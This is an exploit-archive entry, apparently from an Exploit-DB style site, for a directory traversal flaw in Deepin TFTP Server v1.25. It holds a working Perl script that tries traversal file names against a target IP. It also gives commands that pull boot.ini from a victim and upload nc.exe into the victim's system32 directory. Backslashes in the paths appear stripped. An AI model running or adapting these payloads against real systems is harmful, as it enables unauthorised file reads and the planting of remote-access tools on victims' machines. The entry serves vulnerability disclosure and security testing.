[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Deepin TFTP Server Directory Traversal Vulnerability Software Version : v1.25
# Published : 2010-08-25
# Author : demonalex
# Previous Title : Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050)
# Next Title : McAfee LinuxShield <= 1.5.1 Local/Remote Root Code Execution
#Software : Deepin TFTP Server Directory Traversal Vulnerability Software Version : v1.25
#Vendor: Deepin.org
#Vulnerability Published : 2010-08-14
#Vulnerability Update Time :
#Status :
#Impact : Medium
#Bug Description :
#Deepin TFTP Server does not properly sanitise filenames containing directory traversal sequences that are #received from an FTP client.
#Proof Of Concept :
#****************************************************************
#!/usr/bin/perl -w
$|=1;
$target_ip=shift || die "usage: $0 $target_ipn"; @directory_traversal=( '..tmp.txt', '....tmp.txt', '......tmp.txt', '........tmp.txt', '..........tmp.txt', '............tmp.txt', '..............tmp.txt'
);
open(TMP, ">tmp.txt");
print TMP "tmp";
close(TMP);
foreach $dt_content (@directory_traversal){
$dt_it=`tftp.exe $target_ip put tmp.txt $dt_content`;
print "command : tftp.exe $target_ip put tmp.txt $dt_contentn";
print "$dt_it";
if($dt_it=~m/^Transferred successfully/){
print "Directory Traversal PAYLOAD is $dt_content.n";
print "Press [ENTER] Button to continue...n";
<STDIN>;
}
sleep(3);
}
print "Finish!n";
exit(0);
#****************************************************************
#Exploit :
#****************************************************************
#get sensitive file
#c:windowssystem32>tftp [VICTIM_IP] get ../../boot.ini boot.ini put malware c:windowssystem32>tftp [VICTIM_IP] put nc.exe ../../WINDOWS/system32/nc.exe
#****************************************************************
#Credits : This vulnerability was discovered by demonalex(at)163(dot)com Pentester/Researcher Dark2S Security Team/Venustech.GZ Branch